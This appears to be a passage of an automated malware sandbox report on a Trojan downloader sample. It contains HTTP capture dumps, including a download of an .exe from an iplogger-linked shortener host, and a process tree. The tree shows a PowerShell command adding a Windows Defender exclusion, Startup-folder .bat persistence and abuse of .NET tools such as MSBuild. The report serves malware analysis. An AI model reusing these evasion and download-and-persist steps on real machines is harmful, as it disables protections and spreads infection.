                    2024-09-16 19:24:10 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:24:10 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:24:10 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:24:10 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    71192.168.2.649802188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:24:11 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:24:11 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:24:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:24:11 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:24:11 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGDXipmZrgt83wU5NY1Fp4BoDQ0YvbpOYJN26yr28EDIbu4b2XSYcDm%2BPmdolqRFAE1Y8t1YSkGgbilB%2FcXVCusKU7Knn3ND9zcmqX9KnWJvKlpgraz3cAU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433c3c1ab87291-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:24:11 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:24:11 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                    2024-09-16 19:24:11 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:24:11 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:24:11 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:24:11 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:24:11 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:24:11 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:15:20:05
                    Start date:16/09/2024
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe"
                    Imagebase:0x7ff67dcb0000
                    File size:2'274'400 bytes
                    MD5 hash:EC3AFDBD761916A682E9372834365939
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:15:20:05
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:15:20:06
                    Start date:16/09/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
                    Imagebase:0x7ff6e3d50000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:15:20:06
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:15:20:06
                    Start date:16/09/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    Wow64 process (32bit):
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Imagebase:
                    File size:43'008 bytes
                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:6
                    Start time:15:20:07
                    Start date:16/09/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                    Wow64 process (32bit):
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Imagebase:
                    File size:47'584 bytes
                    MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:7
                    Start time:15:20:07
                    Start date:16/09/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                    Imagebase:0xb30000
                    File size:262'432 bytes
                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:9
                    Start time:15:20:08
                    Start date:16/09/2024
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Imagebase:0x7ff7403e0000
                    File size:55'320 bytes
                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:12
                    Start time:15:20:11
                    Start date:16/09/2024
                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Imagebase:0x7ff717f30000
                    File size:496'640 bytes
                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:13
                    Start time:15:20:19
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:14
                    Start time:15:20:19
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:16
                    Start time:15:20:32
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATW4YMuey528R5HSnE54AwE5.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:17
                    Start time:15:20:32
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:19
                    Start time:15:20:40
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:20
                    Start time:15:20:40
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:21
                    Start time:15:20:53
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3KsdkaRiL7RacJah2YobpSxj.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:22
                    Start time:15:20:54
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:23
                    Start time:15:21:02
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u0RvkxN9wEthGCCLh4tn7zqU.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:24
                    Start time:15:21:02
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:25
                    Start time:15:21:21
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4KsgxmPNACDuZ2zjqQjtltvX.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:26
                    Start time:15:21:21
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:27
                    Start time:15:21:35
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3njSfWDGOVl28Hs8hyJ6Y7LT.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:28
                    Start time:15:21:35
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:29
                    Start time:15:21:43
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:30
                    Start time:15:21:43
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:31
                    Start time:15:21:56
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9O41Qow2bZeAiNaUuBCU9sI8.bat" "
                    Imagebase:0x7ff7c0d90000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:32
                    Start time:15:21:56
                    Start date:16/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:33
                    Start time:15:22:04
                    Start date:16/09/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
